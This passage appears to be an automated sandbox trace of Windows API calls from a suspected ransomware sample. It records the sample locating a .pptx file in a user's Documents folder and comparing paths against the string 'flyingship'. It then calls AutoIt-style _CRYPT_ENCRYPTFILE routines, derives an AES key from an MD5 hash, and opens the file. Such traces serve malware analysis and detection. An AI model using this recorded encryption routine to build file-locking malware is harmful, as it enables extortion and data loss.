lpString1="Jn0jS HALPmcxz\\Documents\\k55L_7uM1tYjpSGA.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0171.095] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Documents\\k55L_7uM1tYjpSGA.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0171.095] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Documents\\k55L_7uM1tYjpSGA.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0171.095] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Documents\\k55L_7uM1tYjpSGA.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0171.095] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Documents\\k55L_7uM1tYjpSGA.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0171.095] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Documents\\k55L_7uM1tYjpSGA.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0171.095] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Documents\\k55L_7uM1tYjpSGA.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0171.095] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Documents\\k55L_7uM1tYjpSGA.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0171.095] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Documents\\k55L_7uM1tYjpSGA.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0171.095] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Documents\\k55L_7uM1tYjpSGA.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0171.095] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Documents\\k55L_7uM1tYjpSGA.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0171.095] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Documents\\k55L_7uM1tYjpSGA.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0171.095] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Documents\\k55L_7uM1tYjpSGA.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0171.096] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Documents\\k55L_7uM1tYjpSGA.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0171.096] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Documents\\k55L_7uM1tYjpSGA.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0171.096] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Documents\\k55L_7uM1tYjpSGA.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0171.096] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ocuments\\k55L_7uM1tYjpSGA.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0171.096] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cuments\\k55L_7uM1tYjpSGA.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0171.096] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uments\\k55L_7uM1tYjpSGA.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0171.096] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ments\\k55L_7uM1tYjpSGA.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0171.096] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ents\\k55L_7uM1tYjpSGA.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0171.096] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nts\\k55L_7uM1tYjpSGA.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0171.096] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ts\\k55L_7uM1tYjpSGA.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0171.096] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\k55L_7uM1tYjpSGA.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0171.096] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\k55L_7uM1tYjpSGA.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0171.096] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="k55L_7uM1tYjpSGA.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0171.096] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="55L_7uM1tYjpSGA.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0171.096] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5L_7uM1tYjpSGA.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0171.096] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="L_7uM1tYjpSGA.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0171.096] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_7uM1tYjpSGA.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0171.096] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7uM1tYjpSGA.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0171.096] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uM1tYjpSGA.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0171.096] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="M1tYjpSGA.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0171.096] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1tYjpSGA.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0171.096] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tYjpSGA.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0171.096] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YjpSGA.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0171.096] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jpSGA.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0171.097] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pSGA.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0171.097] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0171.097] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0171.097] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0171.097] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0171.097] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0171.097] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0171.097] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ptx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0171.097] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pptx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0171.097] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pptx", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0171.097] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0171.097] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0171.097] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0171.097] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0171.097] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0171.097] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\k55L_7uM1tYjpSGA.pptx", lpFindFileData=0x87edb8 | out: lpFindFileData=0x87edb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a79df10, ftCreationTime.dwHighDateTime=0x1d57a75, ftLastAccessTime.dwLowDateTime=0x111572f0, ftLastAccessTime.dwHighDateTime=0x1d59c76, ftLastWriteTime.dwLowDateTime=0x111572f0, ftLastWriteTime.dwHighDateTime=0x1d59c76, nFileSizeHigh=0x0, nFileSizeLow=0xa7c0, dwReserved0=0x87ef08, dwReserved1=0x8a7560, cFileName="k55L_7uM1tYjpSGA.pptx", cAlternateFileName="K55L_7~1.PPT")) returned 0x90af58 [0171.098] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0171.098] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0171.098] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0171.098] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0171.098] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0171.098] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0171.098] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0171.098] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0171.098] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0171.098] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0171.098] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0171.098] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0171.099] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0171.099] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0171.099] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0171.099] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0171.099] PeekMessageW (in: lpMsg=0x87eac4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eac4) returned 0 [0171.099] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0171.099] CryptAcquireContextA (in: phProv=0x87ea98, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ea98*=0x9c0c88) returned 1 [0171.100] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0171.100] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0171.100] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0171.100] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0171.101] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0171.101] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0171.101] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0171.101] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0171.101] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0171.101] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0171.101] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0171.101] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0171.101] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0171.101] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0171.101] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0171.101] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0171.101] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.101] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.101] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0171.101] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0171.101] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0171.101] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0171.101] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0171.102] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0171.102] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0171.102] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0171.102] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0171.102] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0171.102] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.102] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.102] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0171.102] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0171.102] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0171.102] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0171.102] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0171.102] CryptCreateHash (in: hProv=0x9c0c88, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87e808 | out: phHash=0x87e808) returned 1 [0171.102] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.102] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.102] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.102] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.103] CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0171.103] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.103] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.103] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0171.103] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0171.103] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0171.103] CryptHashData (hHash=0x90ae18, pbData=0x8dec90, dwDataLen=0x19, dwFlags=0x1) returned 1 [0171.103] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.103] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.103] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.103] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0171.103] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0171.103] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0171.103] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0171.103] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0171.103] CryptDeriveKey (in: hProv=0x9c0c88, Algid=0x660e, hBaseData=0x90ae18, dwFlags=0x1, phKey=0x87e808 | out: phKey=0x87e808*=0x90aed8) returned 1 [0171.103] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.103] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.109] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.109] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.109] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.109] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0171.109] PeekMessageW (in: lpMsg=0x87e944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e944) returned 0 [0171.110] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0171.110] CryptDestroyHash (hHash=0x90ae18) returned 1 [0171.110] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.110] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0171.110] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0171.110] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0171.110] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0171.110] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\k55L_7uM1tYjpSGA.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\k55l_7um1tyjpsga.pptx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0171.110] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.110] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef40 | out: lpNewFilePointer=0x0) returned 1 [0171.110] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0171.111] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0171.111] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0171.111] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0171.111] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0171.111] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0171.111] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debf0 | out: hHeap=0x8a0000) returned 1 [0171.111] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0171.111] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0171.111] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0171.111] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0171.111] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0171.111] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0171.111] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0171.111] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0171.111] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ae18 [0171.111] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0171.111] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0171.111] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 